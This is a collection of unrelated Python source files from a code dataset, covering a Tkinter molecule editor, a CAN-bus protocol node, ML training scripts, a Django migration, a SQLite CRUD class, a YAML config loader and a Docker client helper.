for data in self._molecule_data:
if "widgets" not in data:
widgets = data["widgets"] = {}
else:
widgets = data["widgets"]
if "remove" not in widgets:
# The button to remove a row...
widgets["remove"] = ttk.Button(
frame,
text="-",
width=2,
command=lambda row=row: self.remove_molecule(row),
takefocus=True,
)
if "component" not in widgets:
# the type of component
widgets["component"] = ttk.Combobox(
frame,
values=("solute", "fluid"),
height=4,
width=6,
state="readonly",
takefocus=True,
)
widgets["component"].set(data["component"])
if "source" not in widgets:
# the type of source
widgets["source"] = ttk.Combobox(
frame,
values=("configuration", "SMILES"),
height=4,
width=10,
state="readonly",
takefocus=True,
)
widgets["source"].set(data["source"])
if "definition" not in widgets:
# the SMILES ot system/configuration
widgets["definition"] = ttk.Entry(frame, width=20, takefocus=True)
widgets["definition"].insert("end", data["definition"])
if "count" not in widgets:
# The count for the stoichiometry
widgets["count"] = ttk.Entry(frame, width=5, takefocus=True)
widgets["count"].insert("end", data["count"])
self.logger.debug(" widgets: " + str(widgets))
widgets["remove"].grid(row=row, column=0, sticky=tk.W)
widgets["component"].grid(row=row, column=1, stick=tk.EW)
widgets["source"].grid(row=row, column=2, stick=tk.EW)
widgets["definition"].grid(row=row, column=3, stick=tk.EW)
widgets["count"].grid(row=row, column=4, stick=tk.EW)
row += 1
# The button to add a row...
if self._add_molecule is None:
self._add_molecule = ttk.Button(
frame,
text="+",
width=5,
command=self.add_molecule,
takefocus=True,
)
self._add_molecule.focus_set()
self._add_molecule.lift()
self._add_molecule.grid(row=row, column=0, columnspan=3, sticky=tk.W)
frame.grid_columnconfigure(3, weight=1)
def right_click(self, event):
"""Probably need to add our dialog..."""
super().right_click(event)
self.popup_menu.add_command(label="Edit..", command=self.edit)
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
def handle_dialog(self, result):
if result is None or result == "Cancel":
self.dialog.deactivate(result)
# Reset the molecules
for data in self._molecule_data:
if "widgets" in data:
widgets = data["widgets"]
for w in widgets.values():
w.destroy()
self._molecule_data = []
P = self.node.parameters
for molecule in P["molecules"].value:
self._molecule_data.append({**molecule})
super().handle_dialog(result)
return
if result == "Help":
# display help!!!
return
if result != "OK":
self.dialog.deactivate(result)
raise RuntimeError("Don't recognize dialog result '{}'".format(result))
self.dialog.deactivate(result)
# Shortcut for parameters
P = self.node.parameters
for key in P:
if key not in ("molecules",):
P[key].set_from_widget()
# And handle the molecules
molecules = []
for data in self._molecule_data:
widgets = data["widgets"]
molecules.append(
{
"component": widgets["component"].get(),
"source": widgets["source"].get(),
"definition": widgets["definition"].get(),
"count": widgets["count"].get(),
}
)
P["molecules"].value = molecules
def add_molecule(self):
"""Add a new row to the molecule table."""
self._molecule_data.append(
{
"component": "fluid",
"source": "SMILES",
"definition": "",
"count": "1",
}
)
self.reset_molecules()
def remove_molecule(self, row):
"""Remove a molecule entry from the table.
Parameters
----------
row : int
The row in the table to remove. Note the first molecule is at row 1.
"""
index = row - 1
data = self._molecule_data[index]
if "widgets" in data:
for w in data["widgets"].values():
w.destroy()
del self._molecule_data[index]
self.reset_molecules()
| StarcoderdataPython |
3244997 | # Copyright (C) 2016-2019 Virgil Security Inc.
#
# Lead Maintainer: <NAME> Inc. <<EMAIL>>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# (1) Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# (2) Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# (3) Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ''AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import platform
class VirgilAgentAdapter(object):
"""Adds virgil-agent header to collect metrics in the Cloud"""
def __init__(self, product, version):
# type: (str, str)->None
self.__key = "virgil-agent"
self.__product = product
self.__family = "python"
self.__version = version
self.__platform = platform.system().lower()
def adapt(self, request):
# type: (Request)->Request
"""
Adds virgil-agent header
Args:
request: request to modify
Returns:
same request with virgil-agent header
"""
request_headers = request.headers
header_value = "{product};{family};{platform};{version}".format(
product=self.__product,
family=self.__family,
platform=self.__platform,
version=self.__version
)
request_headers.update({self.__key: header_value})
request.headers = request_headers
return request
| StarcoderdataPython |
1784189 | from pytextrank import json_iter, parse_doc, pretty_print, normalize_key_phrases, render_ranks, text_rank, rank_kernel, top_sentences, limit_keyphrases, limit_sentences, make_sentence
import sys
## Stage 1:
## * perform statistical parsing/tagging on a document in JSON format
##
## INPUTS: <stage0>
## OUTPUT: JSON format `ParsedGraf(id, sha1, graf)`
if __name__ == "__main__":
path_stage2 = sys.argv[1]
path_stage3 = sys.argv[2]
phrases = ", ".join(set([p for p in limit_keyphrases(path_stage2, phrase_limit=12)]))
sent_iter = sorted(limit_sentences(path_stage3, word_limit=150), key=lambda x: x[1])
s = []
for sent_text, idx in sent_iter:
s.append(make_sentence(sent_text))
graf_text = " ".join(s)
print("**excerpts:** %s\n\n**keywords:** %s" % (graf_text, phrases,)) | StarcoderdataPython |
4814823 | import os
import torch
import pandas as pd
import segmentation_models_pytorch as smp
from catalyst.dl.callbacks import DiceCallback, EarlyStoppingCallback, InferCallback, CheckpointCallback
from catalyst.dl.runner import SupervisedRunner
from catalyst.dl import utils
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import StepLR, ReduceLROnPlateau, CosineAnnealingLR
from steel.io.dataset import ClassificationSteelDataset
from steel.models.classification_model import ResNet34
from utils import get_preprocessing, get_training_augmentation, get_validation_augmentation, setup_train_and_sub_df, seed_everything
def main(args):
"""
Main code for training a classification model.
Args:
args (instance of argparse.ArgumentParser): arguments must be compiled with parse_args
Returns:
None
"""
# Reading the in the .csvs
train = pd.read_csv(os.path.join(args.dset_path, "train.csv"))
sub = pd.read_csv(os.path.join(args.dset_path, "sample_submission.csv"))
# setting up the train/val split with filenames
train, sub, id_mask_count = setup_train_and_sub_df(args.dset_path)
# setting up the train/val split with filenames
seed_everything(args.split_seed)
train_ids, valid_ids = train_test_split(id_mask_count["im_id"].values, random_state=args.split_seed,
stratify=id_mask_count["count"], test_size=args.test_size)
# setting up the classification model
ENCODER_WEIGHTS = "imagenet"
DEVICE = "cuda"
model = ResNet34(pre=ENCODER_WEIGHTS, num_classes=4, use_simple_head=True)
preprocessing_fn = smp.encoders.get_preprocessing_fn("resnet34", ENCODER_WEIGHTS)
# Setting up the I/O
train_dataset = ClassificationSteelDataset(
args.dset_path, df=train, datatype="train", im_ids=train_ids,
transforms=get_training_augmentation(),
preprocessing=get_preprocessing(preprocessing_fn),
)
valid_dataset = ClassificationSteelDataset(
args.dset_path, df=train, datatype="valid", im_ids=valid_ids,
transforms=get_validation_augmentation(),
preprocessing=get_preprocessing(preprocessing_fn),
)
train_loader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)
valid_loader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)
loaders = {
"train": train_loader,
"valid": valid_loader
}
# everything is saved here (i.e. weights + stats)
logdir = "./logs/segmentation"
# model, criterion, optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=3e-4)
scheduler = ReduceLROnPlateau(optimizer, factor=0.15, patience=2)
criterion = smp.utils.losses.BCEDiceLoss(eps=1.)
runner = SupervisedRunner()
runner.train(
model=model,
criterion=criterion,
optimizer=optimizer,
scheduler=scheduler,
loaders=loaders,
callbacks=[DiceCallback(), EarlyStoppingCallback(patience=5, min_delta=0.001)],
logdir=logdir,
num_epochs=args.num_epochs,
verbose=True
)
utils.plot_metrics(
logdir=logdir,
# specify which metrics we want to plot
metrics=["loss", "dice", "lr", "_base/lr"]
)
if __name__ == "__main__":
import argparse
# parsing the arguments from the command prompt
parser = argparse.ArgumentParser(description="For training.")
# parser.add_argument("--log_dir", type=str, required=True,
# help="Path to the base directory where logs and weights are saved")
parser.add_argument("--dset_path", type=str, required=True,
help="Path to the unzipped kaggle dataset directory.")
parser.add_argument("--num_epochs", type=int, required=False, default=21,
help="Number of epochs")
parser.add_argument("--batch_size", type=int, required=False, default=16,
help="Batch size")
parser.add_argument("--test_size", type=float, required=False, default=0.1,
help="Fraction of total dataset to make the validation set.")
parser.add_argument("--split_seed", type=int, required=False, default=42,
help="Seed for the train/val dataset split")
parser.add_argument("--num_workers", type=int, required=False, default=2,
help="Number of workers for data loaders.")
args = parser.parse_args()
main(args)
| StarcoderdataPython |
3286440 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import cobra.models.fields.foreignkey
import cobra.models.fields.bounded
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('organization', '0003_organization_avatar'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='WorkReport',
fields=[
('id', cobra.models.fields.bounded.BoundedBigAutoField(serialize=False, primary_key=True)),
('content', models.TextField(null=True, verbose_name='Content', blank=True)),
('summary', models.TextField(null=True, verbose_name='Summary', blank=True)),
('plan', models.TextField(null=True, verbose_name='Plan', blank=True)),
('type', models.CharField(max_length=10, verbose_name='Work Report Type')),
('year', models.IntegerField(verbose_name='Year')),
('serial_number', models.IntegerField(null=True, verbose_name='Serial Number', blank=True)),
('organization', cobra.models.fields.foreignkey.FlexibleForeignKey(to='organization.Organization')),
('owner', cobra.models.fields.foreignkey.FlexibleForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'db_table': 'cobra_summary',
},
bases=(models.Model,),
),
]
| StarcoderdataPython |
33937 | import os
import random
from sklearn.metrics import mean_squared_error as mse
from core.composer.chain import Chain
from core.composer.composer import ComposerRequirements, DummyChainTypeEnum, DummyComposer
from core.models.data import OutputData
from core.models.model import *
from core.repository.dataset_types import NumericalDataTypesEnum, CategoricalDataTypesEnum
from core.repository.model_types_repository import (
ModelMetaInfoTemplate,
ModelTypesRepository
)
from core.repository.quality_metrics_repository import MetricsRepository, RegressionMetricsEnum
from core.repository.task_types import MachineLearningTasksEnum
from core.utils import project_root
random.seed(1)
np.random.seed(1)
import matplotlib.pyplot as plt
def compare_plot(predicted: OutputData, dataset_to_validate: InputData):
fig, ax = plt.subplots()
plt.plot(dataset_to_validate.target, linewidth=1, label="Observed")
plt.plot(predicted.predict, linewidth=1, label="Predicted")
ax.legend()
plt.show()
def calculate_validation_metric(chain: Chain, dataset_to_validate: InputData) -> float:
# the execution of the obtained composite models
predicted = chain.predict(dataset_to_validate)
# plot results
compare_plot(predicted, dataset_to_validate)
# the quality assessment for the simulation results
roc_auc_value = mse(y_true=dataset_to_validate.target,
y_pred=predicted.predict,
squared=False)
return roc_auc_value
# the dataset was obtained from NEMO model simulation
# specify problem type
problem_class = MachineLearningTasksEnum.auto_regression
# a dataset that will be used as a train and test set during composition
file_path_train = 'cases/data/ts/metocean_data_train.csv'
full_path_train = os.path.join(str(project_root()), file_path_train)
dataset_to_compose = InputData.from_csv(full_path_train, task_type=problem_class)
# a dataset for a final validation of the composed model
file_path_test = 'cases/data/ts/metocean_data_test.csv'
full_path_test = os.path.join(str(project_root()), file_path_test)
dataset_to_validate = InputData.from_csv(full_path_test, task_type=problem_class)
# the search of the models provided by the framework that can be used as nodes in a chain for the selected task
models_repo = ModelTypesRepository()
available_model_types, _ = models_repo.search_models(
desired_metainfo=ModelMetaInfoTemplate(input_type=NumericalDataTypesEnum.table,
output_type=CategoricalDataTypesEnum.vector,
task_type=problem_class,
can_be_initial=True,
can_be_secondary=True))
# the choice of the metric for the chain quality assessment during composition
metric_function = MetricsRepository().metric_by_id(RegressionMetricsEnum.RMSE)
# the choice and initialisation
single_composer_requirements = ComposerRequirements(primary=[ModelTypesIdsEnum.ar],
secondary=[])
chain_single = DummyComposer(
DummyChainTypeEnum.flat).compose_chain(data=dataset_to_compose,
initial_chain=None,
composer_requirements=single_composer_requirements,
metrics=metric_function)
train_prediction = chain_single.fit(input_data=dataset_to_compose, verbose=True)
print("Composition finished")
compare_plot(train_prediction, dataset_to_compose)
# the quality assessment for the obtained composite models
rmse_on_valid_single = calculate_validation_metric(chain_single, dataset_to_validate)
print(f'Static RMSE is {round(rmse_on_valid_single, 3)}')
| StarcoderdataPython |
1618844 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from struct import pack, unpack
from threading import Condition
from stucancommon.node import Service, CanNode, Timeout
from .addresses import RCC_GROUP_DEVICE_ID
logger = logging.getLogger(__name__)
class Request(Service):
"""
Base class for a request service that have a condition to wait until notification from another thread
"""
cv = Condition()
class Response(Service):
"""
Base class for a response service
"""
def handle(self, source_address, destination_address, exception=None):
"""
Method override, handle response from a previously sended Service. It will handle response object and notify
request service on success otherwise forward exception
"""
with self.request_class.cv:
if exception is None:
self.request_class.response = self
else:
self.request_class.response = exception
self.request_class.response_count -= 1
if self.request_class.response_count == 0:
self.request_class.cv.notify()
class ReadUserInfoRequest(Request):
"""
Read User Info Service request inherits from Request
"""
SERVICE_ID = 0x0
"""
const int :
Service identifier
"""
PACK_FORMAT = '>H'
"""
const string :
Format to generate a byte-string representation of the object
"""
def __init__(self, *args):
self.info_id = args[0]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.info_id)
class ReadUserInfoResponse(Response):
"""
Read User Info Service response inherits from Response
"""
SERVICE_ID = 0x0
"""
const int :
Service identifier
"""
PACK_FORMAT = '>Hf'
"""
const string :
Format to generate a byte-string representation of the object
"""
request_class = ReadUserInfoRequest
"""
Request service object
"""
def __init__(self, *args):
self.info_id, self.value = args[:2]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.info_id, self.value)
class WriteParameterRequest(Request):
"""
Write Parameter Service request inherits from Request
"""
SERVICE_ID = 0x2
"""
const int :
Service identifier
"""
PACK_FORMAT = '>HBf'
"""
const string :
Format to generate a byte-string representation of the object
"""
def __init__(self, *args):
self.parameter_id, self.part, self.value = args[:3]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.parameter_id, self.part, self.value)
class WriteParameterResponse(Response):
"""
Write Parameter Service response inherits from Response
"""
SERVICE_ID = 0x2
"""
const int :
Service identifier
"""
PACK_FORMAT = '>HBf'
"""
const string :
Format to generate a byte-string representation of the object
"""
request_class = WriteParameterRequest
"""
Request service object
"""
def __init__(self, *args):
self.parameter_id, self.part, self.value = args[:3]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.parameter_id, self.part, self.value)
class ReadParameterRequest(Request):
"""
Read Parameter Service request inherits from Request
"""
SERVICE_ID = 0x1
"""
const int :
Service identifier
"""
PACK_FORMAT = '>HB'
"""
const string :
Format to generate a byte-string representation of the object
"""
def __init__(self, *args):
self.parameter_id, self.part = args[:2]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.parameter_id, self.part)
class ReadParameterResponse(Response):
"""
Read Parameter Service response inherits from Response
"""
SERVICE_ID = 0x1
"""
const int :
Service identifier
"""
PACK_FORMAT = '>HBf'
"""
const string :
Format to generate a byte-string representation of the object
"""
request_class = ReadParameterRequest
"""
Request service object
"""
def __init__(self, *args):
self.parameter_id, self.part, self.value = args[:3]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.parameter_id, self.part, self.value)
class MessageNotification(Response):
"""
Message Notification Service inherits from Response
"""
SERVICE_ID = 0x3
"""
const int :
Service identifier
"""
PACK_FORMAT = '>HI'
"""
const string :
Format to generate a byte-string representation of the object
"""
messages = []
"""
list :
List of messages
"""
def __init__(self, *args):
self.message_id, self.value = args[:2]
def __bytes__(self):
return pack(self.PACK_FORMAT, self.message_id, self.value)
def handle(self, source_address, destination_address, exception=None):
self.messages.append((source_address, self))
error_identifier_dictionary = {
0x01: 'INVALID_FRAME',
0x02: 'DEVICE_NOT_FOUND',
0x03: 'RESPONSE_TIMEOUT',
0x12: 'INVALID_SERVICE_ARGUMENT',
0x13: 'GATEWAY_BUSY',
0x22: 'OBJECT_ID_NOT_FOUND',
0x24: 'INVALID_DATA_LENGTH',
0x25: 'PROPERTY_IS_READ_ONLY',
0x26: 'INVALID_DATA',
0x27: 'DATA_TOO_SMALL',
0x28: 'DATA_TOO_BIG',
0x29: 'WRITE_PROPERTY_FAILED',
0x2A: 'READ_PROPERTY_FAILED',
0x2B: 'ACCESS_DENIED',
0x2D: 'MULTICAST_READ_NOT_SUPPORTED',
}
"""
Those error codes applies for "User Info read service" and "Parameter read/write service".
They are coded in the response in case of a request failure.
"""
class StuCanPublicError(Exception):
"""
Class representing a StuCan2 error, also can generate a string representation of it
"""
def __init__(self, id, error_code):
"""
id : int
Service identifier
error_code : int
Error code number
"""
self.id = id
self.error_code = error_code
self.identifier = error_identifier_dictionary.get(error_code, 'UNKNOWN')
def __str__(self):
return 'StuCanPublicError(id={}, error_code={}, identifier={})'.format(self.id, self.error_code,
self.identifier)
class StuCanPublicNode(CanNode):
"""
Class representing a StuCan public node, inherits from `CanNode`
"""
def __init__(self, driver, address, debug=False):
"""
Initialize CanNode
driver : PythonCanDriver
Relying can interface
address : int
Node CAN address
"""
CanNode.__init__(self, driver, address)
if debug is True:
logging.basicConfig(level=logging.DEBUG)
def handle_rx_frame(self, identifier, data, dlc, flag, time):
"""
Handle a frame received on the CAN bus
Manage behavior as described into StuCan2 public protocol
Parameters
----------
identifier : bytes
CAN frame id
data : bytes
CAN frame data
"""
destination_address = (identifier >> 19) & 0x3FF
if not (destination_address in (self.address, RCC_GROUP_DEVICE_ID)):
return
source_address = (identifier >> 9) & 0x3FF
service_id = (identifier >> 6) & 0x7
flags = identifier & 0x3F
error = flags & 0x1
for service_class in self.services:
if service_id == service_class.SERVICE_ID:
if error == 1:
id, error_code = unpack('>HI', data)
exception = StuCanPublicError(id, error_code)
logger.debug('<- rx: %s from address %d to %d', repr(exception), source_address,
destination_address)
service = service_class(None, None, None)
response = service.handle(source_address, destination_address, exception)
else:
service = service_class.from_bytes(data)
logger.debug('<- rx: %s from address %d to %d', str(service), source_address, destination_address)
response = service.handle(source_address, destination_address)
if response is not None:
self.send_service(source_address, response)
def send_from(self, service_id, destination_address, source_address, data):
"""
Create CAN identifier and access underlying driver to send it and relevant data
Parameters
----------
service_id : int
StuCan2 service identifier
destination_address : int
Targeted device address
source_address : int
Source address
data : bytes
The data parameter of a CAN message, length from 0 to 8 bytes
"""
assert 0 <= service_id <= 0x7
assert 0 <= destination_address <= 0x3FF
assert 0 <= source_address <= 0x3FF
identifier = (destination_address << 19) + (source_address << 9) + (service_id << 6)
self.driver.send(identifier, data, is_extended_id=True)
def send(self, service_id, destination_address, data):
"""
Forward data to send by adding source address
Parameters
----------
service_id : int
StuCan2 service identifier
destination_address : int
Targeted device address
data : bytes
The data parameter of a CAN message
"""
self.send_from(service_id, destination_address, self.address, data)
def send_service(self, address, service):
"""
Send a service
Parameters
----------
address : int
Targeted device address
service : Service
Service object
"""
logger.debug('-> tx: %s to address %d', str(service), address)
data = bytes(service)
assert len(data) <= 8
self.send(service.SERVICE_ID, address, data)
def wait_response(self, address, request, timeout=None):
"""
Entry point to send a service and then wait for the service response,
can raise a timeout exception a StuCanPublicError or the response when successfull
Parameters
----------
address : int
Targeted device address
request : Request
Request service object
Returns
-------
Response
Response object of the service
"""
request_class = type(request)
request_class.response_count = 1
with request_class.cv:
self.send_service(address, request)
return_value = request_class.cv.wait(timeout)
if not return_value:
raise Timeout()
if isinstance(request_class.response, StuCanPublicError):
raise request_class.response
return request_class.response
def messages(self):
"""
Retreive the list of messages previously happened on the CAN bus
Returns
-------
list
Notifications messages
"""
return MessageNotification.messages
| StarcoderdataPython |
118864 | from models.posts import (
BaseCreatePostModel,
BaseDeletePostModel,
CreatePostModel,
ReturnPostModel,
)
from core.errors import ConflictError
import sqlite3
from models.user import UserModel
class PostsCRUD:
def create(
self, conn: sqlite3.Connection, data: BaseCreatePostModel, user: UserModel
) -> None:
data = CreatePostModel(**data.dict(), creator_id=user.id)
cur = conn.cursor()
try:
cur.execute(
"INSERT INTO Posts(id, creator, image, description, created) "
"VALUES(?, ?, ?, ?, ?)",
(
data.id,
data.creator_id,
data.image,
data.description,
data.created,
),
)
finally:
cur.close()
def delete(self, conn: sqlite3.Connection, data: BaseDeletePostModel) -> None:
cur = conn.cursor()
if data.are_you_sure is True:
try:
cur.execute(
"DELETE FROM Posts WHERE id=?",
(data.id,),
)
finally:
cur.close()
else:
raise ConflictError("Action was interrupted by user")
def get_by_creator(
self, conn: sqlite3.Connection, creator: UserModel
) -> list[ReturnPostModel]:
cur = conn.cursor()
try:
cur.execute(
"SELECT id, image, description, created "
"FROM Posts "
"WHERE creator=?"
"ORDER BY created DESC",
(creator.id,),
)
data = cur.fetchall()
return [
ReturnPostModel(
id=id,
creator=creator,
image=image,
description=description,
created=created,
)
for (id, image, description, created) in data
]
finally:
cur.close()
def get_by_subsciber(
self, conn: sqlite3.Connection, user: UserModel
) -> list[ReturnPostModel]:
cur = conn.cursor()
try:
cur.execute(
"SELECT Posts.id, Posts.image, Posts.description, Posts.created, User.id AS user_id, User.login "
"FROM Posts "
"JOIN Subsciptions ON Posts.creator = Subsciptions.to_subscribe "
"JOIN User ON Posts.creator = User.id "
"WHERE Subsciptions.who_subscribe = ? "
"ORDER BY created DESC",
(user.id,),
)
data = cur.fetchall()
return [
ReturnPostModel(
id=id,
creator={"id": user_id, "login": user_login},
image=image,
description=description,
created=created,
)
for (id, image, description, created, user_id, user_login) in data
]
finally:
cur.close()
| StarcoderdataPython |
1617194 | <gh_stars>1-10
class Item3rd:
appid = ''
market_hash_name = ''
url3rd = ''
market3rd = ''
name_in_market3rd = ''
lowest_sell_price = 0 | StarcoderdataPython |
102837 | import yaml
from torch import nn, optim
from pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger
from monai.losses import DiceCELoss
import factorizer as ft
from factorizer import datasets
from factorizer.utils.lightning import SemanticSegmentation
from factorizer.utils.losses import DeepSuprLoss
from factorizer.utils.metrics import DiceMetric, HausdorffDistanceMetric
from factorizer.utils.schedulers import WarmupCosineSchedule
from factorizer.utils.helpers import SaveValResults
def lambda_constructor(loader, node):
lambda_expr = "lambda " + loader.construct_scalar(node)
return eval(lambda_expr)
def get_constructor(obj):
"""Get constructor for an object."""
def constructor(loader, node):
if isinstance(node, yaml.nodes.ScalarNode):
if node.value:
out = obj(loader.construct_scalar(node))
else:
out = obj
elif isinstance(node, yaml.nodes.SequenceNode):
out = obj(*loader.construct_sequence(node, deep=True))
elif isinstance(node, yaml.nodes.MappingNode):
out = obj(**loader.construct_mapping(node, deep=True))
return out
return constructor
Loader = yaml.SafeLoader
# general
Loader.add_constructor("!eval", get_constructor(eval))
Loader.add_constructor("!lambda", lambda_constructor)
# data modules
Loader.add_constructor(
"!BraTSDataModule", get_constructor(datasets.BraTSDataModule)
)
Loader.add_constructor("!BraTSInferer", get_constructor(datasets.BraTSInferer))
# tasks
Loader.add_constructor(
"!SemanticSegmentation", get_constructor(SemanticSegmentation)
)
# layers and blocks
Loader.add_constructor("!Conv3d", get_constructor(nn.Conv3d))
Loader.add_constructor("!ConvTranspose3d", get_constructor(nn.ConvTranspose3d))
Loader.add_constructor("!GroupNorm", get_constructor(nn.GroupNorm))
Loader.add_constructor("!LeakyReLU", get_constructor(nn.LeakyReLU))
Loader.add_constructor("!ReLU", get_constructor(nn.ReLU))
Loader.add_constructor("!GELU", get_constructor(nn.GELU))
Loader.add_constructor("!Same", get_constructor(ft.Same))
Loader.add_constructor("!DoubleConv", get_constructor(ft.DoubleConv))
Loader.add_constructor("!BasicBlock", get_constructor(ft.BasicBlock))
Loader.add_constructor(
"!PreActivationBlock", get_constructor(ft.PreActivationBlock)
)
Loader.add_constructor(
"!FactorizerSubblock", get_constructor(ft.FactorizerSubblock)
)
Loader.add_constructor("!Matricize", get_constructor(ft.Matricize))
Loader.add_constructor("!SWMatricize", get_constructor(ft.SWMatricize))
Loader.add_constructor("!NMF", get_constructor(ft.NMF))
Loader.add_constructor("!MLP", get_constructor(ft.MLP))
Loader.add_constructor(
"!FastSelfAttention", get_constructor(ft.FastSelfAttention)
)
Loader.add_constructor("!ablate", get_constructor(ft.ablate))
# models
Loader.add_constructor("!UNet", get_constructor(ft.UNet))
Loader.add_constructor(
"!SegmentationFactorizer", get_constructor(ft.SegmentationFactorizer)
)
# losses
Loader.add_constructor("!DiceCELoss", get_constructor(DiceCELoss))
Loader.add_constructor("!DeepSuprLoss", get_constructor(DeepSuprLoss))
# optimizers and scheduler
Loader.add_constructor("!AdamW", get_constructor(optim.AdamW))
Loader.add_constructor(
"!WarmupCosineSchedule", get_constructor(WarmupCosineSchedule)
)
# metrics
Loader.add_constructor("!DiceMetric", get_constructor(DiceMetric))
Loader.add_constructor(
"!HausdorffDistanceMetric", get_constructor(HausdorffDistanceMetric)
)
# callbacks
Loader.add_constructor(
"!LearningRateMonitor", get_constructor(LearningRateMonitor)
)
Loader.add_constructor("!ModelCheckpoint", get_constructor(ModelCheckpoint))
Loader.add_constructor(
"!TensorBoardLogger", get_constructor(TensorBoardLogger)
)
Loader.add_constructor("!SaveValResults", get_constructor(SaveValResults))
def read_config(path):
with open(path, "rb") as file:
config = yaml.load(file, Loader)
return config
| StarcoderdataPython |
178234 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import argparse
import pandas as pd
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
FEATURES = ["crim", "zn", "indus", "nox", "rm",
"age", "dis", "tax", "ptratio"]
LABEL = "medv"
COLUMNS = FEATURES + [LABEL]
def input_fn(data_set):
feature_cols_dict = {f: tf.constant(data_set[f].values, shape=[data_set[f].values.shape[0], 1]) for f in FEATURES}
labels = tf.constant(data_set[LABEL].values)
return feature_cols_dict, labels
def main(_):
training_set = pd.read_csv("../../data/boston/boston_train.csv", skipinitialspace=True,
skiprows=1, names=COLUMNS)
test_set = pd.read_csv("../../data/boston/boston_test.csv", skipinitialspace=True,
skiprows=1, names=COLUMNS)
prediction_set = pd.read_csv("../../data/boston/boston_predict.csv", skipinitialspace=True,
skiprows=1, names=COLUMNS)
feature_cols = [tf.contrib.layers.real_valued_column(k) for k in FEATURES]
regressor = tf.contrib.learn.DNNRegressor(feature_columns=feature_cols,
hidden_units=[10, 10],
model_dir="tmp/boston_model",
activation_fn=tf.nn.relu,
dropout=0.5,
optimizer="Adam")
print("Training...")
regressor.fit(input_fn=lambda: input_fn(training_set), steps=FLAGS.train_steps)
print("Eval...")
ev = regressor.evaluate(input_fn=lambda: input_fn(test_set), steps=1)
print("Evaluation: ", ev)
loss_score = ev["loss"]
print("Loss: {0:f}".format(loss_score))
print("Predictions...")
predict_result_list = regressor.predict(input_fn=lambda: input_fn(prediction_set))
predictions = list(predict_result_list)
print ("Predictions: {}".format(str(predictions)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--train_steps', type=int, default=1000,
help='The number of training steps')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| StarcoderdataPython |
142605 | # Generated by Django 3.1.12 on 2021-09-24 11:41
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('teams', '0001_squashed_0003_auto_20210325_0812'),
]
operations = [
migrations.CreateModel(
name='Department',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.TextField(unique=True)),
],
),
migrations.AddField(
model_name='team',
name='department',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teams', to='teams.department'),
),
]
| StarcoderdataPython |
1775917 | import pandas as pd
data_path = 'data/'
business_df = None
def init_businesses():
global business_df
business_df = pd.read_csv(data_path + 'df.csv', sep='\t')
init_businesses()
def get_business_list(product):
return business_df[business_df['Product'] == product]
| StarcoderdataPython |
1734817 | import os
import docker
__docker_client = None
__management_network = None
def get_docker_client(cert_path, host_addr, host_port):
global __docker_client
if __docker_client:
return __docker_client
tls_config = docker.tls.TLSConfig(
ca_cert=os.path.join(cert_path, "ca.pem"),
client_cert=(
os.path.join(cert_path, "cert.pem"),
os.path.join(cert_path, "key.pem")
),
verify=True
)
__docker_client = docker.DockerClient(
base_url="tcp://{addr_}:{port_}".format(
addr_=host_addr,
port_=host_port
),
tls=tls_config,
version="auto",
)
return __docker_client
def get_management_network():
global __management_network
if __management_network:
return __management_network
if not __docker_client:
raise Exception("Create a docker client first, before creating a network...")
# Creates a new docker network to bridge the manager to the runners.
__management_network = __docker_client.networks.create(
name="pga-management",
driver="overlay",
check_duplicate=True,
attachable=True,
scope="swarm",
labels={"PGAcloud": "PGA-Management"},
)
return __management_network
| StarcoderdataPython |
1615319 | """Settings for Rhasspy."""
import json
import logging
import os
